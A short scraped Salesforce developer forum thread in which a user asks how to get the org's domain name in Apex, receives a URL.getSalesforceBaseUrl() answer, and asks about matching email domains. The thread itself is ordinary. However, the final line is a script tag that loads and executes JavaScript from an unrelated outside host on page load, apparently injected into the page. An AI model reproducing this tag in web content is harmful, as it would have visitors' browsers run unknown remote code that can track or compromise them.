function readOnly(count){ }
Starting November 20, the site will be set to read-only. On December 4, 2023,
forum discussions will move to the Trailblazer Community.
+ Start a Discussion
Hd037Hd037 

Domain name of our org. ?

how to get Domain Name of our Org.  in Apex???

Jia HuJia Hu
try this,

system.debug( URL.getSalesforceBaseUrl().toExternalForm() );

doc:
http://www.salesforce.com/us/developer/docs/apexcode/Content/apex_methods_system_url.htm
Hd037Hd037

ya thats right..

but suppose i want to use domain name of email id .

 

for Ex. any user is entering email id as xyz@abc.com then i want to match its domain with org. domain..

 

is it possible ?

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>